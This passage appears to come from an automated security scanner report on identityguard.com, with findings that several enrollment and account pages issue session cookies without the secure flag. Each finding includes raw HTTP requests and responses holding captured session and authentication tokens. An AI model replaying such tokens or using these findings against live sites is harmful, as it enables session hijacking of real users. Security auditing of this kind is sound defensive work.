Location: https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1?utm_medium=affiliates&campid=14&mktp=Next&cenhp1=1&hid=205557652&c1=394717213CD1&c2=CD1&storeId=10051&krypto=c69BtQbpODM%2BkfRwmoM2j7tndSfDT2UaaPm2KXJn1QDOPZVmPOBCRk5LxUDE%2BNzQsFGcO7H6PRgZ%0AUzRCzSqr4gFyuz56UYEGYcFlKxEr2ITR%2B3HMJo6H08xc7TfuUQ4pZgtNaIfyJyKqGIBnQwZn9tbt%0AjBT335psUfZLzpYUDpIyQZV9DE9ItepY03Kz3giu61wsI%2BkhJaxQW5vfuJAl8g%3D%3D&ddkey=https:EnrollmentStep1
Set-Cookie: JSESSIONID=0000KToyasEeVy_fQHf6TuSK9Mc:14ej3pg70; Path=/
Set-Cookie: REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; Expires=Sun, 08 May 2011 03:35:20 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_100000002777198=100000002777198%2cVoEQEMAaxiiOxH5%2fHe03xssaVwY%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10051; Path=/
Set-Cookie: WC_USERACTIVITY_100000002777198=100000002777198%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvblgaG4LolUzuM7owtK6Gi%2bVaq7muVpgRvizF3GEYunmq5qAGshvG%2fXVXEJobjTsDIa%0auhm1cgxjc8Dg7Bta%2bhk6VW6qOQMB228jrA07GAd7ulM%2f%2bYbi2c00FUf8MBs4lni1kKc%2bItFLUY8t%0a%2bqcUB9ES; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US
Content-Length: 0


11.7. https://secure.identityguard.com/EnrollmentStep1  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.identityguard.com
Path:   /EnrollmentStep1

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /EnrollmentStep1 HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:54:53 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: JSESSIONID=00004gQx0HYIzU0u1rsJFSCKOae:14glhsrp2; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_AUTHENTICATION_100000002778497=100000002778497%2cfuFkopkWEkisK7JVwSHZCk2Fg64%3d; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_100000002778497=100000002778497%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvaKV1emOZmaDIsN60yDGs%2f4FZeGlU%2fcp4iOWyLpRXGCfz%2fwweHVY7Hq%2bwZIeUab4Rdh%0a970qOhWk1U0%2b34FkyW3t2a0ceHvoL5Um9KCH%2bCco7lhMPZfqD3H0mz2OHDBpxmE3tpO1JboG1SI8%0aX7oYHanN; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Language: en-US
Content-Length: 1903


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...

11.8. https://secure.identityguard.com/EnrollmentStep1  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.identityguard.com
Path:   /EnrollmentStep1

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /EnrollmentStep1?storeId=10051&MID=40642&mktp=Next&hid=205561061&campid=58&utm_medium=affiliates&c1=CD76&cenhp1=1 HTTP/1.1
Host: secure.identityguard.com
Connection: keep-alive
Referer: http://www.identityguard.com/ipages/le33/letp30daysfree33.html?mktp=Next&hid=205561061&campid=58&utm_medium=affiliates&c1=CD76&cenhp1=1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CoreID6=87049420402113036145977&ci=90226925; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmz=242046173.1303674405.2.2.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; __utma=242046173.2037034150.1303614598.1303614598.1303674405.2; __utmc=242046173; 90226925_clogin=l=1303677758&v=1&e=1303678665607

Response

HTTP/1.1 302 Found
Date: Sun, 24 Apr 2011 20:43:32 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1?utm_medium=affiliates&campid=58&mktp=Next&cenhp1=1&hid=205561061&c1=CD76&storeId=10051&krypto=c69BtQbpODM%2BkfRwmoM2j7tndSfDT2UaaPm2KXJn1QDOPZVmPOBCRuhiTmGlNQlKR0CJE8wZVQkY%0Ay2Jx5sZm2%2Bc1nEEXBnYuQQ3BWvtpmM6coDK2OOHmKwKxClJA89ePCaUt39rN8VuwBucOvrx%2B9TkJ%0A6crEVWo0rY%2FXGTgGduabk5azXxfx8Q%3D%3D&ddkey=https:EnrollmentStep1
Set-Cookie: JSESSIONID=0000c3d68erGa8XMQGd_2dqp2tI:14glhsrp2; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_100000002780393=100000002780393%2c0tUiqY%2bh4ueMUlR80CUXFIFyzig%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10051; Path=/
Set-Cookie: WC_USERACTIVITY_100000002780393=100000002780393%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvbaPS8OMuDprrXw%2bctfg%2fFQfgKprQwzfue95Bem%2bD0Rybv6t6W3ThtgfeBnJx04RieF%0aa2t5F6ax7Pxa0pnWDckRKfyuP6GyE8B4GxiySWMu0m5Fqpnsl7jxXyiLbaIxcQXvsSVpN5Yurslj%0a1K%2fzReuF; Path=/
Vary: Accept-Encoding,User-Agent
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Language: en-US
Content-Length: 0


11.9. https://secure.identityguard.com/webapp/wcs/stores/servlet/EnrollmentStep1  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/EnrollmentStep1

Issue detail

The following cookies were issued by the application and do not have the secure flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/EnrollmentStep1 HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:54:57 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: JSESSIONID=000035X06bwKDD8N7alBoK7raIX:14glhsrp2; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_-1002=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=DEL; Expires=Thu, 01 Dec 1994 16:00:00 GMT; Path=/
Set-Cookie: WC_AUTHENTICATION_100000002778501=100000002778501%2cREgbC04LJ6U1QpS0gdsZp%2f3mOwg%3d; Path=/; Secure
Set-Cookie: WC_USERACTIVITY_100000002778501=100000002778501%2c10051%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnUH1mjvuHvasC%2bE9g%2bXauPutHRYRK1bUlw2emLGIRuiWRlKXr%2b90jRo1I1u%2bOQIWI7oj%2bEf7YNBQ%0a1dZ9QymMr1N6N8l%2ffmEBdTr4it3pen6k0SUux3SsboNk39BJXEe%2fMErd2KqRTSLtByQPtj9hPiYc%0a8nzOTygk; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Language: en-US
Content-Length: 1903


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...

11.10. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXContactUs  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/INTXContactUs

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/INTXContactUs HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:55:14 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: JSESSIONID=0000JEHZujswBDR5wgEMRinwd8Q:14glhsrp2; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 5245


<!-- Start of JSTLEnvironmentSetup.jspf -->


   
...[SNIP]...

11.11. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXEnrollSessionTimeout  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/INTXEnrollSessionTimeout

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/INTXEnrollSessionTimeout HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:55:49 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: JSESSIONID=0000RU_ayvVxP7vPjd2RpcqdQ4B:14glhsrp2; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 8623


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">


<!-- Start of JSTLEnvironmentSetup.jspf -->



...[SNIP]...

11.12. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXProcessEnrollmentInfo  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/INTXProcessEnrollmentInfo

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/INTXProcessEnrollmentInfo HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:55:20 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: JSESSIONID=0000d43uPIRRqVNCyWFXQ9JvUnG:14glhsrp2; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 2080


<!-- Start of JSTLEnvironmentSetup.jspf -->


   
...[SNIP]...

11.13. https://secure.identityguard.com/webapp/wcs/stores/servlet/INTXStreamlinedOfferDetails  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/INTXStreamlinedOfferDetails

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/INTXStreamlinedOfferDetails HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 16:55:04 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: no-cache
Cache-Control: no-store, no-cache
Expires: now
Set-Cookie: JSESSIONID=0000JNwX44ij8bl52XAeGH6hC-R:14glhsrp2; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Language: en-US
Content-Length: 1903


<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en-US" xmlns="http://www.w3.org/1999/xhtml" lan
...[SNIP]...

11.14. https://secure.identityguard.com/webapp/wcs/stores/servlet/Logoff  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.identityguard.com
Path:   /webapp/wcs/stores/servlet/Logoff

Issue detail

The following cookie was issued by the application and does not have the secure flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapp/wcs/stores/servlet/Logoff HTTP/1.1
Host: secure.identityguard.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000NAoPInZyy4gzsvmSvaSl9un:14glhsrp2; WC_AUTHENTICATION_-1002=%2d1002%2cXDUBvgNLbZN0%2fMz%2biC6eCYA8Aqc%3d; WC_USERACTIVITY_100000002776876=DEL; __utmz=242046173.1303614598.1.1.utmcsr=Next|utmccn=(not%20set)|utmcmd=affiliates; WC_SESSION_ESTABLISHED=true; CoreID6=87049420402113036145977&ci=90226925; cmTPSet=Y; WC_GENERIC_ACTIVITYDATA=[17525396%3atrue%3afalse%3a0%3asaFHO%2fgFArjbcjFvy3NRAb0mkB4%3d][com.ibm.commerce.context.base.BaseContext|10051%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|null%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|null%26null%26null%26%2d2000%26null%26null%26null][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; __utma=242046173.2037034150.1303614598.1303614598.1303614598.1; __utmc=242046173; REFERRER=http://www.identityguard.com/ipages/le4/letp30daysfree1.html?mktp=Next&utm_medium=affiliates&hid=205557649&campid=13&c1=id4+106163471CD1&c2=CD1&cenhp1=1; __utmb=242046173.7.10.1303614598; WC_AUTHENTICATION_100000002776876=DEL; WC_ACTIVEPOINTER=%2d1%2c10051; WC_USERACTIVITY_-1002=%2d1002%2c10051%2c0%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cVz%2fAitjOs4I2cdO%2bxoqprV%2blaSQkpnVQwa2wezkIGTw80PvmDFUxMbp8A2zNavPmZ2DY1XZU27aS%0aoHvsS72xgR%2bERpXFUKcYCLnTfUBbH7JTkS4fgthPFj95qXChOpWj9DsXavyhZFM%3d; 90226925_clogin=l=1303615928&v=33&e=1303616828151;

Response

HTTP/1.1 404 Not Found
Date: Sun, 24 Apr 2011 16:55:30 GMT
Server: Apache/2.2.0 (Fedora)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
$WSEP:
Set-Cookie: JSESSIONID=0000COYz6QjJhyUvKX-OFTBz5a5:14glhsrp2; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 667


<HTML>


<HEAD><TITLE>Error 404</TITLE></HEAD>
<BODY>

<FONT size="+1">An error has occurred:</FONT>
<TABLE border="2" bordercolor="#98d3ec">
   <TR bgcolor="#
...[SNIP]...

11.15. https://secure.lifelock.com/portal/login  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://secure.lifelock.com
Path:   /portal/login

Issue detail

